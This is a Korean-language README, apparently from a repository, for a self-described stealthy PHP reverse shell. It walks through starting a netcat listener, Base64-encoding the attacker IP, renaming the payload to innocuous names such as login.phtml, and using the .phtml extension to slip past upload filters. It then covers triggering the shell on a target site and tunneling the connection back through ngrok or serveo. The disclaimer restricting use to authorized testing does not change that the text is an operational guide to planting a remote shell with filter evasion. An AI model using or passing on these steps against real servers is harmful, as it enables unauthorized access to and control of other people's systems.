
강력하고 은밀한 PHP 리버스 셸로, 윤리적 해킹 및 침투 테스트를 위해 설계되었습니다. 안정적이고 조용한 연결을 사용자 시스템으로 되돌립니다.
이것은 모의 해킹 및 침투 테스트를 위해 설계된 강력하고 은밀한 PHP 리버스 셸입니다. 사용자 시스템으로 안정적이고 조용한 연결을 설정합니다.
이 PHP 리버스 셸은 교육 및 승인된 침투 테스트 목적으로만 개발되었습니다.
개발자는 이 리버스 셸을 사용하여 수행된 모든 오용, 손해 또는 불법 활동에 대해 책임을 지지 않습니다.
책임감 있게 사용하고, 소유하거나 명시적인 테스트 허가를 받은 시스템에서만 사용하십시오. 무단 접근은 불법이며 법적으로 처벌받을 수 있습니다.
.phtml 확장자로 업로드하여 일부 필터 우회1. 사용자 시스템에서 리스너 시작
nc -lvnp 4444
2. IP 또는 호스트 이름을 Base64로 인코딩
다음 간단한 명령을 사용하세요:
echo "your_ip_or_hostname" | base64
예시:
echo "192.168.1.5" | base64
출력을 복사하여 PHP 리버스 셸 스크립트의 $ip_b64 값을 교체하십시오.
3. PHP 리버스 셸 스크립트 업데이트:
다음 줄을 Base64로 인코딩된 IP/호스트 이름 및 포트로 변경하세요:
$ip_b64 = 'YOUR_BASE64_ENCODED_IP_OR_HOSTNAME';
$port = YOUR_LISTENER_PORT;
4. 파일 이름을 변경하고 업로드
파일 이름을 덜 의심스러운 이름으로 변경하세요, 예시:
login.phtml
avatar.phtml
update.phtml
.phtml 확장자를 사용하면 .php를 차단하는 일부 서버에서 파일이 실행되도록 도와줍니다.
이 파일을 파일 업로드가 허용된 대상 웹사이트에 업로드하세요.
5. 리버스 셸 트리거
업로드된 파일을 브라우저에서 엽니다:
http://target.com/uploads/login.phtml
열리면 리스너가 리버스 셸 연결을 수신합니다.
모바일 데이터를 사용하거나 라우터(NAT) 뒤에 있는 경우 IP가 공개되지 않을 수 있습니다. 이 경우 리버스 셸이 사용자 시스템에 직접 연결할 수 없습니다. 이를 해결하려면 Ngrok 또는 Serveo와 같은 TCP 터널링 도구를 사용하세요.
Ngrok 설치
다음 명령 실행:
ngrok tcp 4444
다음과 같은 결과가 표시됩니다:
Forwarding tcp://4.tcp.ngrok.io:18900
PHP 리버스 셸 스크립트 업데이트:
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;
리스너 시작:
nc -lvnp 4444
다음 명령 실행:
ssh -R 0:localhost:4444 serveo.net
다음과 같은 메시지가 표시됩니다:
Forwarding TCP connections from serveo.net:46603
PHP 리버스 셸 스크립트 업데이트:
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;
리스너 시작:
nc -lvnp 4444
이 프로젝트는 GNU General Public License v3.0에 따라 라이선스가 부여됩니다.